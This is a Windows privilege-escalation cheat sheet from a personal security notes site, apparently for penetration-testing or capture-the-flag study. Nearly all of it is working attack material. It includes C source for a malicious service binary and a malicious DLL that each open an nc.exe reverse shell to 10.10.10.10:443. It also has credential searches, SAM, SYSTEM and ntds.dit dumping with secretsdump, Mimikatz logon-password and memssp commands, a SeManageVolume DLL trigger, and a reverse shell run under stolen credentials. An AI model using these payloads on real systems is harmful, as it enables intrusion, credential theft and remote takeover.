Cubana's CyberSecurity

2. Windows

3 min read

Window Enumeration

# Find Files
Get-ChildItem -Path C:\ -Include *.kdbx,*.ini -File -Recurse -ErrorAction SilentlyContinue
 
Get-ChildItem -Path C:\Users -Include *.txt,*.ini,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
 
# Grep Strings
Get-ChildItem . -File -Recurse | Where-Object Extension -notin '.exe','.dll','.jpg','.png','.zip' | Select-String 'password|secret|token|key|credential'
 
Select-String -Path * -Pattern "password|credential" -ErrorAction SilentlyContinue
 
# Check Installed Applications
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
 
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
 
# Check Scheduled tasks
schtasks /query /fo LIST /v > schtasks.txt
 
# Check Powershell History
type C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Service Binary Hijacking

Check Services info

# Every Service
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName
 
# Every Running Service
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'}
 
# Every Service except system32 path
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | findstr /VI "system32"
 
# Every Running Service except system32 path
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'} | findstr /VI "system32"
 
# Check Service Start Type (e.g. mysql)
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
 
# Check Unquoted Service Path
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
 
wmic service get name,pathname | Select-String -NotMatch "C:\\Windows\\" | Select-String -NotMatch '"'
 
wmic service get name,pathname | Where-Object { $_ -notmatch "C:\\Windows\\" -and $_ -notmatch '"' }

Create Malicious Binary rev.exe (rev.c):

#include <stdlib.h>
int main (){
	int cmd;
	cmd = system ("C:\\windows\\tasks\\nc.exe 10.10.10.10 443 -e cmd.exe");
	return 0;
}
// x86_64-w64-mingw32-gcc rev.c -o rev.exe

Service Stop, Start, Misc…

# Query Service
sc.exe query mysql
 
# Server Operators Abusing
sc.exe config VMTools binPath="C:\Windows\Tasks\rev.exe"
 
# Start Service
sc.exe start mysql
net start mysql 
Start-Service -Name mysql
 
# Stop Service
sc.exe stop mysql
net stop mysql
Stop-Service -Name mysql
 
# Reboot PC
shutdown /r /t 0
/r : reboot
/t 0 : right now (0 second after)

DLL Hijacking

Create Malicious DLL rev.dll (rev.cpp):

#include <stdlib.h>
#include <windows.h>
 
BOOL APIENTRY DllMain(
HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved )
{
	switch ( ul_reason_for_call )
	{
		case DLL_PROCESS_ATTACH:
		int i;
		i = system ("C:\\windows\\tasks\\nc.exe 10.10.10.10 443 -e cmd");
		break;
		case DLL_THREAD_ATTACH:
		break;
		case DLL_THREAD_DETACH:
		break;
		case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}
// x86_64-w64-mingw32-gcc rev.cpp --shared -o rev.dll

Privilege Abusing

SeBackupPrivilege

#1. Local SAM, SYSTEM Registry dump

# reg save
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
 
# SAM,SYSTEM Path
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM

#2. Disk Dump diskshadow + robocopy

# backup.txt
set verbose on 
set metadata C:\Windows\Tasks\test.cab
set context persistent 
add volume C: alias cdrive 
create 
expose %cdrive% E: 
 
# in target host:
diskshadow /s ./backup.txt
robocopy /b E:\Windows\ntds .
 
# download to kali & extract hashes 
download ntds.dit
reg save HKLM\SYSTEM SYSTEM
download SYSTEM
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

SeManageVolumePrivilege

github exploit: https://github.com/CsEnox/SeManageVolumeExploit

Steps:

1. After Execute Exploit, you will able to modify C:\Windows Files.
2. Make Malicious DLL Files
3. Trigger it

#1. Trigger with systeminfo:

Change DLL file:
C:\windows\system32\wbem\tzres.dll
 
Trigger it:
systeminfo
=> If success, you will get 'network service' shell
=>

#2. Trigger with PrintNotify:

Change DLL file:
C:\Windows\System32\spool\drivers\x64\3\PrintConfig.dll 
 
Trigger it:
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)

Mimikatz

Basic Post Exploit

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "exit"

When cannot extract passwords due to Credential Guard

.\mimikatz.exe "privilege::debug" "misc::memssp" "exit"
=> After someones login, check mimilsa.log
 
type C:\Windows\System32\mimilsa.log

PowerUp.ps1

# Check  Modifiable Service Binary
Get-ModifiableServiceFile
 
# Check Unquoted Service Path
Get-UnquotedService

WinPEAS

# Make Colored Output
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Command Execute as Other User (Need Credential)

$password = convertto-securestring -AsPlainText -Force -String "Password_Here";
$credential = new-object -typename System.Management.Automation.PSCredential -argumentlist "SNIPER\Administrator",$password;
Invoke-Command -ComputerName LOCALHOST -ScriptBlock { C:\windows\tasks\nc.exe 10.10.10.10 443 -e cmd.exe} -credential $credential;

Reference

Graph View